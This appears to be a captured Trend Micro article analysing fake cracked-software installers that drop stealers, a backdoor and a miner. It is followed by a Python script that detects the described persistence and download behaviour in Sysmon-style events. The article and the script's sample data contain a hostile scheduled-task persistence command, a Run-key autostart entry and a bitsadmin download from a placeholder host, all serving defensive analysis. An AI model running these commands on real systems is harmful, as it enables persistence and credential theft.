www.trendmicro.com
104.111.231.15
URL:
https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html
Submission: On October 04 via api from US — Scanned from DE
Malware

FAKE INSTALLERS DROP MALWARE AND OPEN DOORS FOR OPPORTUNISTIC ATTACKERS

We recently spotted fake installers of popular software being used to deliver bundles of malware onto victims’ devices. These installers are widely used lures that trick users into opening malicious documents or installing unwanted applications.
By: Ryan Maglaque, Joelson Soares, Gilbert Sison, Arianne Dela Cruz, Warren Sto.Tomas
September 27, 2021
Read time: 5 min (1395 words)

It is widely known that, with regard to cybersecurity, the user is often identified as the weakest link. Users are typical entry vectors for attacks and common social-engineering targets for attackers. Enterprises can also suffer from these individual weak links: employees are sometimes unaware of online threats or unfamiliar with cybersecurity best practices, and attackers know exactly how to take advantage of this gap in security.

One way that attackers trick users is by luring them with unauthorized apps or installers carrying malicious payloads. We recently spotted some of these fake installers being used to deliver bundles of malware onto victims’ devices. Fake installers are not a new technique; in fact, they are old and widely used lures that trick users into opening malicious documents or installing unwanted applications. Some users fall into this trap when they search the internet for free or cracked versions of paid applications.

Looking inside the fake installers

We saw users trying to download cracked versions of non-malicious applications that have limited free versions and paid full versions, specifically TeamViewer (a remote connectivity and engagement app), VueScan Pro (an app for scanner drivers), Movavi Video Editor (an all-in-one video maker), and Autopano Pro for macOS (an app for automated picture stitching).

One example that we dive into here involves a user who tried to download an unauthorized version of TeamViewer (an app that has actually been used as camouflage for trojan spyware before). The user downloaded a malicious file disguised as a crack installer for the application.

Figure 1. Malicious files downloaded by the user

After the user downloaded and executed these files, one of the child processes created other files and the executable setup.exe/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file appears to be the source of most of the downloaded malicious files, as seen in the following figure.

Figure 2. Unpacking of setup-installv1.3.exe via WinRAR.exe

Afterward, the file aae15d524bc2.exe was dropped and executed via Command Prompt. It then spawned a file, C:\Users\{username}\Documents\etiKyTN_F_nmvAb2DF0BYeIk.exe, which in turn initiated a BITS admin download. BITS admin is a command-line tool that can create, download, and upload jobs and monitor their progress. The tool also allows a user to obtain arbitrary files from the internet, a feature that attackers can abuse.

Figure 3. BITS admin execution detection

We also observed that information in the browser's credential store was taken by the attacker. Specifically, the stored data in C:\Users\{username}\AppData\Local\Microsoft\Edge\User Data\Default\Login was copied. Credentials stored in browsers are often critical personal data that attackers can leverage to gain access to personal, business, or financial accounts. Attackers can even compile and sell this information in underground markets.

To maintain persistence, an executable was registered in the AutoStart registry key and a scheduled task was created:

* Create scheduled task: C:\Windows\System32\schtasks.exe /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\{username}\AppData\Roaming\services64.exe"'
* AutoStart registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\prun: C:\WINDOWS\PublicGaming\prun.exe

As previously mentioned, these cases come about because users search for free applications and trust that someone has put the cracked or stolen full version online as a gesture of good will.
But as we can see, attackers simply take advantage of those who download these files.

In Figure 4, we can see that a trojanized VueScan file is already in a Downloads folder and is executed by the legitimate user.

Figure 4. Unpacking of 61193b_VueScan-Pro-974.zip, which created a new process

Following the execution of setup_x86_x64_install.exe, it created and executed a new file named setup_installer.exe, which dropped several files and queried several domains. Most of these domains are malicious, as evidenced in Figure 5.

Figure 5. Dropped malicious files querying several domains

This malicious payload also exhibits backdoor behavior. We can see that the attackers are listening on these channels: 127.0.0.1:53711 and 127.0.0.1:53713. This lets the attacker keep a foothold on the computer; from there, they can possibly move laterally across the network and, if it is an enterprise device, compromise a critical company asset.

The other fake installers exhibited similar behavior, exploiting users who attempt to download either an unauthorized application cracker/activator or an illegal full version. These infections then establish persistence for later access.

How widespread is the threat?

Camouflaged malicious installers and apps are often used to load malware onto victims’ devices. A few recent examples are widespread fake cryptocurrency-mining applications that took advantage of neophyte cryptominers, and fake Covid-19 update apps. In tracking this current batch of fake installers, we were able to detect incidents around the world.

We do not initially classify these particular events as targeted attacks, mostly because in all cases the users actively searched for application crackers or unlocked versions of software. But even if these were not targeted attacks at first, they can later lead to opportunistic hacks because the attacker already has a presence on the computer. Aside from loading malware, the attackers can use their initial access to conduct malicious activity, such as compromising a company’s virtual private network (VPN). They could even sell the access to other cybercrime gangs, such as ransomware operators. It is important to stress that attackers use every tool within reach, and even legitimate applications can be weaponized.

Figure 6. Unique detections per region of the indicators of compromise (IOCs) listed below. The data is sourced from Trend Micro™ Smart Protection Network™ for the month of August.

Of course, we also know that software piracy is prevalent in many regions. From the data in Figure 6, we can surmise that it is still a major threat to security. Users have to be more aware of the threats these illegal installers can carry and implement stricter security practices for installing and executing applications downloaded from the internet onto their personal and work devices.

The global pandemic has pushed users out of offices and into work-from-home (WFH) situations where there are other “physically” connected devices, such as internet of things (IoT) devices, personal mobiles, and personal computers, that have weak security. These present a problem because malware can quickly spread from personal devices to business computers on the same network.

Malicious capabilities of the fake installers

We were able to analyze some of the malicious files bundled into the installers. Their capabilities are varied, from cryptocurrency mining to stealing credentials from social media applications.
We enumerate them in this table:

Malicious file: Trojan.Win32.MULTDROPEX.A
Actions:
* Main dropper of the malicious file
* Disguised as cracker/installer of legitimate applications

Malicious file: Trojan.Win32.SOCELARS.D
Actions:
* Gathers information regarding the machine
* Collects browser information
* Collects social media information (Instagram and Facebook)
* Collects information from the Steam application
* Drops a Google Chrome extension responsible for further stealing of Facebook/credit card/payment credentials

Malicious file: Trojan.Win32.DEALOADER.A
Actions:
* Malware downloader
* URL inactive, but based on research possibly another stealer

Malicious file: TrojanSpy.Win32.BROWALL.A
Actions:
* Collects browser information
* Collects cryptocurrency wallet information

Malicious file: TrojanSpy.Win32.VIDAR.D
Actions:
* Collects browser information
* Collects credentials

Malicious file: Trojan.Win64.REDLINESTEALER.N
Actions:
* Executes commands from a remote user
* Gathers information regarding the machine
* Collects browser information
* Collects FTP client information
* Collects VPN information
* Collects cryptocurrency wallet information
* Collects information from other applications (Discord, Steam, Telegram)

Malicious file: Coinminer.MSIL.MALXMR.TIAOODBL
Actions:
* Downloads miner module hosted on Discord
* XMR miner
* Installs persistence via scheduled tasks and AutoRun registry

How to protect yourself from the threat of malware

As mentioned, fake installers are not new, but they are still a widely used delivery system for malware. Attackers are uploading more and more of these files for a simple reason: they work. Users download and execute these installers, which lets attackers maintain persistence on personal devices and gives them a way into company networks as well.

To combat this threat, it is important for users to be educated on the effects of downloading files from untrusted websites. There are also other security measures to take:

* A multilayered security approach is necessary when protecting the environment. If one layer of protection fails, there are still others in place that can prevent the threat.
* Application control will help prevent the execution of suspicious files.
* Restricting admin rights for users who do not need them is also a good preventive measure.

Indicators of Compromise

Tags: Malware | Endpoints | Research | Articles, News, Reports | Cyber Threats

AUTHORS
* Ryan Maglaque, Threats Analyst
* Joelson Soares, Threats Analyst
* Gilbert Sison, Threats Analyst
* Arianne Dela Cruz, Threats Analyst
* Warren Sto.Tomas, Sr. Threat Research Engineer
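The persistence and download behaviors described above (the onlogon scheduled task, the Run-key entry, the BITS admin download, and an executable spawned from an archive) can be surfaced from endpoint telemetry. The following is an added example written for this page, not Trend Micro's code: a small rule set run over constructed Sysmon-style records; the field names, the user name, the sample file paths, and the BITS URL are assumptions.

```python
import re

# Constructed Sysmon-style records (Event ID 1 = process creation, 13 = registry
# value set) in the shape a SIEM presents after parsing. The task, Run-key value
# and archive-spawned executable mirror the article's description; the user name
# "alice", the Temp paths and the download URL are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Users\alice\Documents\etiKyTN_F_nmvAb2DF0BYeIk.exe",
     "cmdline": r'schtasks.exe /create /f /sc onlogon /rl highest /tn "services64" '
                r'/tr "C:\Users\alice\AppData\Roaming\services64.exe"'},
    {"id": 13, "image": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
     "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\prun",
     "details": r"C:\WINDOWS\PublicGaming\prun.exe"},
    {"id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Users\alice\Documents\etiKyTN_F_nmvAb2DF0BYeIk.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high "
                r"http://placeholder.invalid/data/data.7z C:\Users\alice\AppData\Local\Temp\data.7z"},
    {"id": 1, "image": r"C:\Users\alice\Downloads\setup-installv1.3.exe",
     "parent": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Users\alice\Downloads\setup-installv1.3.exe"'},
    # Benign: a daily task and an autostart entry pointing into Program Files.
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\run.exe"'},
    {"id": 13, "image": r"C:\Windows\explorer.exe",
     "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]

# Directories a standard user cannot write to; anything else is treated as suspect.
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\",
                    "c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TASK_TARGET = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)  # /tr "path" or /tr path
URL = re.compile(r"https?://", re.I)


def in_trusted_dir(path):
    """True when the executable lives where a standard user cannot write."""
    return path.strip("'\"").lower().startswith(TRUSTED_PREFIXES)


def check_process(ev):
    """Rules for process-creation events; returns (rule, evidence) or None."""
    img, cmd, parent = ev["image"].lower(), ev["cmdline"], ev["parent"].lower()
    c = cmd.lower()
    if img.endswith("\\schtasks.exe") and "/create" in c:
        m = TASK_TARGET.search(cmd)
        target = (m.group(1) or m.group(2)) if m else ""
        # Run-at-logon with highest privileges, or a task body in a user-writable path.
        if ("/sc onlogon" in c and "/rl highest" in c) or (target and not in_trusted_dir(target)):
            return ("suspicious_scheduled_task", cmd)
    if img.endswith("\\bitsadmin.exe") and URL.search(cmd):
        return ("bitsadmin_download", cmd)
    if parent.endswith("\\winrar.exe") and not in_trusted_dir(ev["image"]):
        return ("archive_spawned_executable", ev["image"])
    return None


def check_registry(ev):
    """Flag Run-key autostart values whose payload is outside trusted directories."""
    if "\\currentversion\\run\\" in ev["target"].lower() and not in_trusted_dir(ev["details"]):
        return ("run_key_autostart", ev["target"] + " -> " + ev["details"])
    return None


def analyze(events):
    """Return (rule, evidence) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        hit = check_process(ev) if ev["id"] == 1 else check_registry(ev)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for rule, evidence in analyze(SAMPLE_EVENTS):
        print(f"{rule:28} {evidence}")
```

The two benign records at the end of the sample are there to show the rules do not fire on an ordinary daily task or an autostart entry that points into Program Files.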